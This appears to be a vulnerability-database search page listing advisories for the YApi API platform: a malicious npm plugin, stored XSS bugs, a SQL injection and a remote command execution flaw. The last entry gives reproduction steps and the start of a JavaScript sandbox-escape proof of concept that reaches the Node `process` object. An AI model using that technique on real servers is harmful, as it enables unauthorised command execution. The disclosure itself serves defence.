81 matches found
Malicious code in yapi-plugin-games-google-login (npm)
Source: ghsa-malware 50fd58da7aed5c7f4b93b71f00b778b524976db87da82ad0c037d021e2197649 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
MAL-2024-11021 Malicious code in yapi-plugin-games-google-login (npm)
Source: ghsa-malware 50fd58da7aed5c7f4b93b71f00b778b524976db87da82ad0c037d021e2197649 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
CVE-2024-33831
A stored cross-site scripting (XSS) vulnerability in the Advanced Expectation - Response module of yapi v1.10.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the body field...
PT-2024-25502 · Yapi · Yapi
Name of the Vulnerable Software and Affected Versions: yapi version 1.10.2. Description: A stored cross-site scripting (XSS) vulnerability in the Advanced Expectation - Response module allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the body field...
yapi security vulnerability
YMFE YApi is a visual interface management platform from YMFE, Inc. A security vulnerability exists in yapi version v1.10.2, which stems from the presence of a stored cross-site scripting (XSS) vulnerability that allows an attacker to execute arbitrary web script or HTML by injecting a crafted...
CVE-2024-33831
CVE-2024-33831 describes a stored cross-site scripting (XSS) vulnerability in the Advanced Expectation - Response module of yapi v1.10.2. The issue allows an attacker to inject a crafted payload into the body field, enabling execution of arbitrary web scripts or HTML in the victim’s browser. Co...
Cross-site Scripting in yapi-vendor
Cross Site Scripting (XSS) vulnerability in yapi 1.9.1 allows attackers to execute arbitrary code via the /interface/api edit page...
GHSA-4JQW-VFMJ-9RMH Cross-site Scripting in yapi-vendor
Cross Site Scripting (XSS) vulnerability in yapi 1.9.1 allows attackers to execute arbitrary code via the /interface/api edit page...
CVE-2021-36686
Cross Site Scripting (XSS) vulnerability in yapi 1.9.1 allows attackers to execute arbitrary code via the /interface/api edit page...
Cross site scripting
Cross Site Scripting (XSS) vulnerability in yapi 1.9.1 allows attackers to execute arbitrary code via the /interface/api edit page...
PT-2023-12296 · Yapi · Yapi
Name of the Vulnerable Software and Affected Versions: yapi version 1.9.1. Description: A Cross Site Scripting (XSS) issue allows attackers to execute arbitrary code via the "interface/api" edit page. Recommendations: For yapi version 1.9.1, update to a newer version that contains a fix for this iss...
YMFE YApi cross-site scripting vulnerability
YMFE YApi is a visual interface management platform from YMFE Corporation. A security vulnerability exists in YMFE YApi version 1.9.1. An attacker can exploit this vulnerability to execute arbitrary code via the /interface/api edit page...
CVE-2021-36686
CVE-2021-36686 is an XSS vulnerability in YMFE YApi 1.9.1, exploitable via the /interface/api edit page. The issue affects the web interface code path used to edit API definitions; the precise root cause is described as a Cross Site Scripting flaw. The CVE entry notes that PoC exploits exist (exp...
YAPI SQL Injection Vulnerability
YAPI is an API management platform. YAPI is vulnerable to SQL injection, which can be exploited by attackers to obtain a user token and cause command execution...
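Yapi remote command execution vulnerability
How to reproduce this issue: after registering and logging in, create a project, then choose to set the global mock script and set the command to make a remote request to my server address. Then add an interface and access the interface's mock address. The server shows the following response; the remote server received the request. poc: const sandbox = this const ObjectConstructor = this.constructor const FunctionConstructor = ObjectConstructor.constructor const myfun = FunctionConstructor'return process' const process = myfun...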